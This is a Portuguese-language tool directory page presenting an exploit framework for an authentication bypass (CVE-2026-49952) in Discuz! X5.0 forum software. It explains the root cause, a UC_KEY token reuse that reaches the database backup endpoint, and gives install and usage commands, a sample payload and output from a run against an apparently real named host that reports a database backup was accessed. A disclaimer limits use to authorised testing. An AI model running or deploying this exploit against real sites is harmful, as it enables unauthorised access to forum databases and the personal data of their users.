Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Discuz-X5.0-Authentication-Bypass-Exploit-Framework — Discuz! X5.0 Framework de Exploração de Bypass de Autenticação (CVE-2026-49952) - Vulnerabilidade crítica que permite acesso não autenticado a backups de banco de dados por meio da reutilização de token do oráculo de criptografia UC_KEY. CVSS 9.1. Ferramenta completa com detecção de versão, ataques com múltiplos payloads, shell interativo e exploração automatizada. Somente para testes autorizados. | Kitploit
Ferramentas/GitHubGitHub/cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework
Autenticação e AutorizaçãoFrameworks de ExploraçãoAnálise de VulnerabilidadesExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoSegurança de Banco de Dados

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHub
cerberusmrxi/discuz-x5.0-authentication-bypass-exploit-framework

Discuz-X5.0-Authentication-Bypass-Exploit-Framework

Ver Repositório
115há 2 mesesAinda não revisado

Sobre

Discuz! X5.0 Framework de Exploração de Bypass de Autenticação (CVE-2026-49952) - Vulnerabilidade crítica que permite acesso não autenticado a backups de banco de dados por meio da reutilização de token do oráculo de criptografia UC_KEY. CVSS 9.1. Ferramenta completa com detecção de versão, ataques com múltiplos payloads, shell interativo e exploração automatizada. Somente para testes autorizados.

Compartilhar

Discuz! X5.0 Framework de Exploração de Bypass de Autenticação

Security CVE CVSS Python License Version

⚡ CVE-2026-49952 | CVSS 9.1 (Crítica) | Versão 1.0.0

Uma ferramenta profissional de teste de penetração projetada para identificar e demonstrar a vulnerabilidade crítica de bypass de autenticação no Discuz! X5.0.

D1

📋 Índice

  • ⚠️ Aviso Legal

  • 🔍 Visão Geral

  • 🎯 Detalhes da Vulnerabilidade

  • ✨ Recursos

  • 📦 Instalação

  • 🚀 Início Rápido

  • 💻 Exemplos de Uso

  • 🖥️ Shell Interativo

  • 🛡️ Considerações de Segurança

  • 🔧 Solução de Problemas

  • 📄 Licença


⚠️ Aviso Legal

AVISO IMPORTANTE Esta ferramenta é fornecida apenas para fins educacionais e testes de segurança autorizados. NÃO use esta ferramenta em sistemas que você não possui ou para os quais não possui permissão explícita para testar. O acesso não autorizado a sistemas de computador é ilegal e antiético. O autor não assume nenhuma responsabilidade por qualquer uso indevido ou dano causado por esta ferramenta. Ao usar esta ferramenta, você concorda em cumprir todas as leis e regulamentos aplicáveis.


🔍 Visão Geral

O Discuz! X5.0 Framework de Exploração de Bypass de Autenticação foi projetado para identificar e demonstrar a vulnerabilidade crítica de bypass de autenticação (CVE-2026-49952) nas versões do Discuz! X5.0 lançadas entre 20 de março de 2026 e 1º de maio de 2026.

Esta vulnerabilidade permite que atacantes não autenticados acessem a funcionalidade de backup de banco de dados (dbbak.php) explorando o oráculo de criptografia UC_KEY para reutilização de tokens, potencialmente expondo conteúdos sensíveis do banco de dados.

Principais Destaques

  • 🏆 Pontuação CVSS: 9.1 (Crítica)

  • 🔐 Impacto: Bypass de Autenticação

  • 📂 Acesso: Arquivos de Backup do Banco de Dados

  • ⚡ Complexidade: Baixa (Fácil de Explorar)

  • 🎯 Alvo: Discuz! X5.0 (20260320 - 20260501)


🎯 Detalhes da Vulnerabilidade

Resumo Técnico

AtributoDetalhes
Tipo de VulnerabilidadeBypass de Autenticação
ID do CVECVE-2026-49952
Versão do CVSS3.1
Pontuação CVSS9.1 (Crítica)
Vetor de AtaqueRede
Complexidade do AtaqueBaixa
Privilégios NecessáriosNenhum
Interação do UsuárioNenhuma
Impacto na ConfidencialidadeAlto
Impacto na IntegridadeAlto
Impacto na DisponibilidadeAlto
Maturidade do Código de ExploitFuncional
Nível de RemediaçãoCorreção Oficial Disponível

Causa Raiz

A vulnerabilidade existe no endpoint dbbak.php, onde o mecanismo de validação de token depende do oráculo de criptografia UC_KEY. Ao criar um payload específico na solicitação de login (member.php), um atacante pode obter um token de autenticação válido que pode ser reutilizado para acessar a funcionalidade de backup do banco de dados sem a devida autorização.

Versões Afetadas

  • ❌ Discuz! X5.0 (20260320 - 20260501) - Vulnerável

  • ✅ Discuz! X5.0 (20260510+) - Corrigido


✨ Recursos

Recursos Principais

  • 🔍 Detecção de Versão: Identificação automática de fingerprint e da versão do Discuz!.

  • ⚡ Ataque Multi-Payload: Teste paralelo de múltiplas variantes de payload.

  • 🖥️ Shell Interativo: Interface de linha de comando completa para exploração manual.

  • 🚀 Exploração Automatizada: Exploração com um clique e configuração mínima.

  • 📊 Salvamento de Resultados: Exporta os resultados de exploração para arquivos com timestamp.

  • 🌐 Suporte a Proxy: Configuração de proxy HTTP/HTTPS para tráfego de rede.

  • 🎯 Varredura com Threads: Número configurável de threads para otimização de desempenho.

  • 🎨 Saída Colorida: Saída de terminal com código de cores profissional.

Recursos Avançados

  • 🔐 Suporte SSL/TLS: Lida com alvos HTTP e HTTPS.

  • 🔄 Gerenciamento de Sessão: Mantém o estado de sessão persistente.

  • 📦 Personalização de Payload: Suporte para injeção de payload personalizado.

  • 🎯 Validação de Alvo: Verifica a instalação do Discuz! antes da exploração.


📦 Instalação

Pré-requisitos

  • Python: Versão 3.7 ou superior

  • Pip: Gerenciador de pacotes do Python

Instalar a partir do código-fonte

# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework

# Install required packages
pip install -r requirements.txt

# Verify installation
python3 exploit.py --help

Instalar com Docker

# Build the Docker image
docker build -t exploit .

# Run the container
docker run -it --rm exploit http://target.com

🚀 Início Rápido

Uso Básico

# Simple exploitation
python3 exploit.py http://target.com

# With output file
python3 exploit.py http://target.com --output results.txt

# Verbose mode for debugging
python3 exploit.py http://target.com --verbose

Uso Avançado

# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10

# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"

💻 Exemplos de Uso

Exemplo 1: Exploração Básica

python3 exploit.py http://discuz.eda.com.my
📤 Saída Esperada
██████╗ ██╗███████╗██╗   ██╗███████╗███████╗██████╗ 
██╔══██╗██║██╔════╝██║   ██║╚══███╔╝╚══███╔╝╚════██╗
██║  ██║██║███████╗██║   ██║  ███╔╝  ███╔╝  █████╔╝
██║  ██║██║╚════██║██║   ██║ ███╔╝  ███╔╝  ██╔═══╝ 
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝

Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt

╔══════════════════════════════════════════════════════════╗
║  EXPLOIT SUCCESSFUL                                      ║
╠══════════════════════════════════════════════════════════╣
║  Target: http://discuz.eda.com.my                        ║
║  Authcode: aBcDeFgHiJkLmNoPqRsT...                       ║
║  Status: Database backup accessed                        ║
║  Data Size: 24567 bytes                                  ║
║  Saved to: discuz_exploit_20260724_143218.txt            ║
╚══════════════════════════════════════════════════════════╝
Baixar ferramenta